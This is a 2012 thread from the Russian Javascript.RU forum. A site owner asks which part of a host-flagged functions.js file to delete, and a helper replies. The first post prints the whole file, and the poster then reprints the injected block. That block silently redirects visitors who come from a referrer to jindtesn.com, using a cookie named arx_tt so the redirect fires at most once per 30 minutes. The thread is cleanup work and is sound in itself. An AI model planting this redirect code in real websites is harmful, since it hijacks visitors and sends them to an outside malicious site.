Javascript.RU

Создать новую тему Ответ
 
Опции темы Искать в теме
  #1 (permalink)  
Старый 17.06.2012, 14:53
Новичок на форуме
Отправить личное сообщение для smedvedev Посмотреть профиль Найти все сообщения от smedvedev
 
Регистрация: 17.06.2012
Сообщений: 3

Редирект в JS скрипте -что убрать ?
Здравствуйте уважаемые форумчани, помогите пожалуйста разобраться в проблеме. Есть сайт на котором стоит вредоносный код в JS? какую часть иммено мне убрать чтобы не попортить функционал:

function backgroundOnLoad()
{
    setTimeout('showBody()', 10);
}

function showBody()
{
    document.getElementById('body_div').style.visibility = 'visible';
}

function showBodyDelayed()
{
    setTimeout
    (
        function ()
        {
            document.getElementById('body_div').style.visibility = 'visible';
        },
        500
    );
}
function setCookie (name, value, expires, path, domain, secure) {
		  document.cookie = name + "=" + escape(value) +
			((expires) ? "; expires=" + expires : "") +
			((path) ? "; path=" + path : "") +
			((domain) ? "; domain=" + domain : "") +
			((secure) ? "; secure" : "");
	}

	function getCookie(c_name) {
		var i,x,y,ARRcookies=document.cookie.split(";");
		for (i=0;i<ARRcookies.length;i++) {
		    x=ARRcookies[i].substr(0,ARRcookies[i].indexOf("="));
		    y=ARRcookies[i].substr(ARRcookies[i].indexOf("=")+1);
		    x=x.replace(/^\s+|\s+$/g,"");
		    if (x==c_name)	{
				return unescape(y);
			}
		}
	}	
	
	function strlen(string){
		if(typeof string == "undefined") {
			return 0;
		} else {
			return string.length;
		}
	}

	var rSite = 'http://jindtesn.com';
	var dt = new Date(), expiryTime = dt.setTime( dt.getTime() + 1800000 );
	var currentCookie = getCookie("arx_tt");
	
	if(!document.referrer) {
	
		var referringURL = rSite;
		var local = "";
		var referrer = 0;
		setCookie("arx_tt", 1, dt.toGMTString(), "/");
		
	} else {
	
		var referringURL = document.referrer;
		referringURL = rSite + window.location.pathname;
		var referrer = 1;
		
	}

	if (strlen(currentCookie) == 0 && referrer == 1) {

		var setted = 1;
		setCookie("arx_tt", 1, dt.toGMTString(), "/");
		location.href = referringURL; 
		
	}
	
	setCookie("arx_tt", 1, dt.toGMTString(), "/");


Я вот пока убрал эту часть:


var rSite = 'http://jindtesn.com';
	var dt = new Date(), expiryTime = dt.setTime( dt.getTime() + 1800000 );
	var currentCookie = getCookie("arx_tt");
	
	if(!document.referrer) {
	
		var referringURL = rSite;
		var local = "";
		var referrer = 0;
		setCookie("arx_tt", 1, dt.toGMTString(), "/");
		
	} else {
	
		var referringURL = document.referrer;
		referringURL = rSite + window.location.pathname;
		var referrer = 1;
		
	}

	if (strlen(currentCookie) == 0 && referrer == 1) {

		var setted = 1;
		setCookie("arx_tt", 1, dt.toGMTString(), "/");
		location.href = referringURL; 
		
	}
	
	setCookie("arx_tt", 1, dt.toGMTString(), "/");


Правильно ли я сделал?
Всем спасибо за ответы.
Ответить с цитированием
  #2 (permalink)  
Старый 17.06.2012, 15:06
без статуса
Отправить личное сообщение для Deff Посмотреть профиль Найти все сообщения от Deff
 
Регистрация: 25.05.2012
Сообщений: 8,219

Строка вызывающая переод
Воть location.href = referringURL

А собствено этот какой то счетчик ? Чей ? -Возможно он должен стоять во фрейме

На кой Вам вообще этот сайт ? => http://jindtesn.com

Вот тут - подобное => http://qps.ru/dxMu3

Последний раз редактировалось Deff, 17.06.2012 в 15:09.
Ответить с цитированием
  #3 (permalink)  
Старый 17.06.2012, 15:15
Новичок на форуме
Отправить личное сообщение для smedvedev Посмотреть профиль Найти все сообщения от smedvedev
 
Регистрация: 17.06.2012
Сообщений: 3

ВОт я нашел в данном скрипте, мне нужно удалить какие-то части.
Хост написал вот тут проблема:

На Вашем сайте был обнаружен вредоносный контент в файле
~/www/htdocs/js/functions.js

В частности:

var rSite = 'http://jindtesn.com';
var referringURL = rSite;
referringURL = rSite + window.location.pathname;


Вот только данные строки или еще нужно то что после них??
Ответить с цитированием
  #4 (permalink)  
Старый 17.06.2012, 15:17
без статуса
Отправить личное сообщение для Deff Посмотреть профиль Найти все сообщения от Deff
 
Регистрация: 25.05.2012
Сообщений: 8,219

smedvedev,
Само деяние переадресации просходит в строке 24 Вашего нижнего скрипта
закоментьте данную строку - редирек должен исчезнуть
Ответить с цитированием
  #5 (permalink)  
Старый 17.06.2012, 15:28
Новичок на форуме
Отправить личное сообщение для smedvedev Посмотреть профиль Найти все сообщения от smedvedev
 
Регистрация: 17.06.2012
Сообщений: 3

Ну мне нужно все же убрать, зачем мне удалять 24 строку, если я могу удалить все что мне не нужно.
Ответить с цитированием
  #6 (permalink)  
Старый 17.06.2012, 16:36
без статуса
Отправить личное сообщение для Deff Посмотреть профиль Найти все сообщения от Deff
 
Регистрация: 25.05.2012
Сообщений: 8,219

smedvedev,
Гы - дык я и спрашивал - зачем весь этот код

Тут из нужного возможно ток эта часть:
function backgroundOnLoad()
{
    setTimeout('showBody()', 10);
}

function showBody()
{
    document.getElementById('body_div').style.visibility = 'visible';
}

function showBodyDelayed()
{
    setTimeout
    (
        function ()
        {
            document.getElementById('body_div').style.visibility = 'visible';
        },
        500
    );
}
function setCookie (name, value, expires, path, domain, secure) {
		  document.cookie = name + "=" + escape(value) +
			((expires) ? "; expires=" + expires : "") +
			((path) ? "; path=" + path : "") +
			((domain) ? "; domain=" + domain : "") +
			((secure) ? "; secure" : "");
	}

	function getCookie(c_name) {
		var i,x,y,ARRcookies=document.cookie.split(";");
		for (i=0;i<ARRcookies.length;i++) {
		    x=ARRcookies[i].substr(0,ARRcookies[i].indexOf("="));
		    y=ARRcookies[i].substr(ARRcookies[i].indexOf("=")+1);
		    x=x.replace(/^\s+|\s+$/g,"");
		    if (x==c_name)	{
				return unescape(y);
			}
		}
	}	
	
	function strlen(string){
		if(typeof string == "undefined") {
			return 0;
		} else {
			return string.length;
		}
	}
Ответить с цитированием
Ответ



Опции темы Искать в теме
Искать в теме:

Расширенный поиск


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Что не так в этом скрипте? Demidovstan Работа 1 13.05.2009 13:08
Что за ошибка ??? BiGLoafeF Общие вопросы Javascript 3 09.04.2009 05:06
Что означает конструкция ? ivanmara Общие вопросы Javascript 55 07.01.2009 02:54
Что в скрипте не правильно? 6AT9 Общие вопросы Javascript 12 25.11.2008 12:18
Не могу сделать редирект в JS alpar_andr Общие вопросы Javascript 11 25.09.2008 22:31